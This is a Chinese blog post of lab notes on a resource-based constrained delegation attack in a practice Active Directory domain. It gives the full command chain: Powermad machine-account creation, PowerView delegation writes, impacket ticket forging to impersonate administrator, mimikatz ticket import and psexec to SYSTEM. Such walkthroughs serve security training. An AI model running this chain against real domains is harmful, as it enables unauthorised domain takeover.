第136天:内网安全-横向移动&资源约束委派

已于 2024-08-26 23:46:51 修改
阅读量466 收藏 13
点赞数 6
文章标签: 安全
于 2024-08-26 23:42:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/141574481
版权

利用条件

首先是dc域控主机必须是win2012以上的主机

其次是域内有一个账户,可以同时登录两台主机

利用  jie 可以登录  win2008  也可以登录  win7

资源委派不需要设置委派,默认即可

实验复现

复现环境

通过网盘分享的文件:136-xiaodi.local内网域环境镜像文件
链接: https://pan.baidu.com/s/1H3ypkEoTiJMbwfMxJ7JMCA?pwd=wnra 提取码: wnra

这里在本地复现,cs中操作时一致的

使用adfind工具查询域内是否有SID一致的主机,并获取主机名

AdFind.exe -h DC的ip -b "DC=域,DC=控" -f "objectClass=computer" mS-DS-CreatorSID
AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

 要利用资源委派就得知道这个用户是谁,根据这个sid,利用工具sid2user.exe去查询用户名,需要删除sid的s-1以及后面的所有横杠

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

 

那么如果你拿到的就是dbadmin用户,就可以利用该账户从web渗透到dc,没拿到就得想办法去获取这个用户

利用这个工具去执行下面的攻击

https://gitcode.com/gh_mirrors/po/Powermad/overview?utm_source=csdn_github_accelerator&isLogin=1

添加机器

Set-ExecutionPolicy Bypass -Scope Process   ##设置允许执行脚本
import-module .\Powermad.ps1             ##导入模块
New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456

执行完成以后域控内有一个test1主机

获取新主机的sid值

Set-ExecutionPolicy Bypass -Scope Process 
Import-Module .\PowerView.ps1
Get-NetComputer test1 -Properties objectsid

 修改目标主机的属性

Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)"   ##(刚才获得的sid值)
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose  ##(DATA是攻击的目标主机)

检验是否配置成功

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

 

这个时候就可以生成票据去执行后续操作了,由于需要用到python程序,所以这里我还是用cs上线生成sockets代理

利用impack套件里面的getst.py获得票据,这里生成票据的时候不管你是再本地还是在代理都要记得设置hosts文件,否则无效

proxychains4 python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

生成了一个票据,上传到服务器,利用mimikatz导入票据

mimikatz kerberos::ptc administrator.ccache

再访问

提升权限

python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。

xiaojiesec
关注
  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网安全横向移动&非约束委派&约束委派&资源约束委派&数据库攻防
今天是几号的博客
04-05 1467
由于非约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,总的来说,如果需要在Windows环境中使用委派功能,建议使用约束委派而不是非约束委派,以提高系统和数据的安全性。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,
内网渗透之横向移动 委派-非约束委派&约束委派&资源委派
m0_62207170的博客
05-07 764
内网渗透之横向移动 委派-非约束委派&约束委派&资源委派
135&136-横向移动&非约束委派&约束委派&资源约束委派&数据库攻防
DamnVanish的博客
08-24 540
约束委派相关的知识是域内很重要的点
内网安全:非约束委派 约束委派 资源约束委派
qq_50854662的博客
06-03 119
内网安全:非约束委派 约束委派 资源约束委派
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
lw19155275856的博客
03-14 449
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
小迪安全培训2023期笔记汇总-持续更新
热门推荐
今天是几号的博客
03-03 1万+
基础入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA。基础入门-HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断。信息打点-Web应用&源码泄漏&开源闭源&指纹识别&GIT&SVN&DS&备份。基础入门-ChatGPT篇&注册体验&结合安全&融入技术&高效赋能&拓展需求。信息打点-Web应用&企业产权&指纹识别&域名资产&网络空间&威胁情报。
2022网鼎杯半决赛复盘
龙狼刺的博客
07-12 1782
该靶场为2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4个flag,分布于不同的靶机。
java笔记整理
weixin_42615335的博客
10-20 1459
目前比较流行的java技术整理
JAVA面试题
三番鱼
11-05 2375
https://blog.csdn.net/u011279240/article/details/80532555 几个大厂的面试题目目录: java基础(40题) 多线程(51题) 设计模式(8点) JVM(12题) 数据结构与算法(17题) 数据库(22题) Spring (13题) Netty(7大题) 缓存(9题) 技术框架(8题) 技术深度(12题) 分布式(33题) 系统架构(18题)...
第71内网安全-域横向网络&传输&应用层隧道技术1
08-03
1.代理和隧道技术区别 2.隧道技术为了解决什么 3.隧道技术前期的必备条件 1.双向连接反弹 shell 2.多向连接反弹 shell-配合转发 3.相关 n
第70内网安全-域横向内网漫游Socks代理隧道技术1
08-03
内网安全是信息技术领域中的一个重要话题,特别是在企业网络环境中,域横向内网漫游Socks代理隧道技术是一种解决内网间通信难题的有效方法。本文将详细介绍相关知识点,并通过实际案例来展示如何应用这些技术。 ...
第66内网安全-域横向批量at&schtasks&impacket1
08-03
1. 建立 IPC 链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4.
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&RBCD资源&Operators组成员&HTLMRelay结合
HACKONE的博客
06-23 342
基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。所以核心就是谁或什么权限能修改msDS-AllowedToActOnBehalfOfOtherIdentity。
探索安全领域的新星:哈希函数SHA3-512
zwa20110606的博客
08-23 1195
SHA3-512是美国国家标准与技术研究院(NIST)于2015年正式发布的第三代安全哈希算法。它是为了解决SHA-2系列算法存在的安全隐患而设计的,具有更高的安全性和灵活性。SHA3-512作为一种新型哈希函数,凭借其高安全性、灵活性和优越性能,在信息安全领域具有广泛的应用前景。随着加密技术的不断发展,相信SHA3-512将在未来为我国网络安全保驾护航。
如何使用双重IP代理实现更安全的网络访问
最新发布
IPIPGO的博客
08-26 458
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
以数据安全筑牢新时代旅游安全之基,硬盘文件数据销毁,硬盘销毁
2301_79618370的博客
08-26 260
在这个大数据时代,让我们共同携手,以《旅游大数据安全与隐私保护要求(征求意见稿)》为指引,筑牢旅游数据安全之基,为新时代旅游安全工作保驾护航。让游客在享受美好旅游体验的同时,无需担忧数据安全问题,让旅游行业在数字化的浪潮中蓬勃发展。征求意见稿对旅游大数据的通用安全目标、安全与隐私保护生命周期管理、安全与隐私保护运维管理、安全与隐私保护监控管理以及典型旅游应用场景大数据安全等方面作出了规范。而在典型旅游应用场景大数据安全方面,征求意见稿针对在线旅游平台、旅游景区、酒店等不同场景,提出了具体的安全要求。
信息系统安全等级划分及其重要性:构建安全基石
w13359990065的博客
08-23 499
我国的“信息系统安全等级保护制度”正是在这一背景下应运而生,旨在通过等级划分,为不同级别的信息系统提供适配的安全保护措施,确保信息资产的安全可控。3. 促进业务发展:确保信息系统的安全运行,不仅能够保护企业免受信息安全事件的冲击,还能够提升客户和合作伙伴的信任,促进业务的持续稳定发展。在数字化转型的浪潮中,企业应将等级划分作为信息安全建设的出发点,通过科学合理的安全防护措施,为业务的持续发展提供坚实的信息安全保障。4. 第四级(强制保护级):适用于对国家安全、社会秩序、公共利益构成特别严重损害的信息系统。
出现“此网站无法提供安全的连接,使用了不受支持的协议”的解决方法
CTIshuzihuafuwu的博客
08-22 235
在访问网站时,出现“此网站无法提供安全的连接”这一提示信息,指出网站所用的协议未得到支持。同时,错误代码“ERR_SSL_VERSION_OR_CIPHER_MISMATCH”表明,这一问题可能与ssl版本或加密算法的不兼容有关。经过一系列的测试发现,该问题仅在使用IE浏览器、google浏览器和最新版本的Edge浏览器时出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值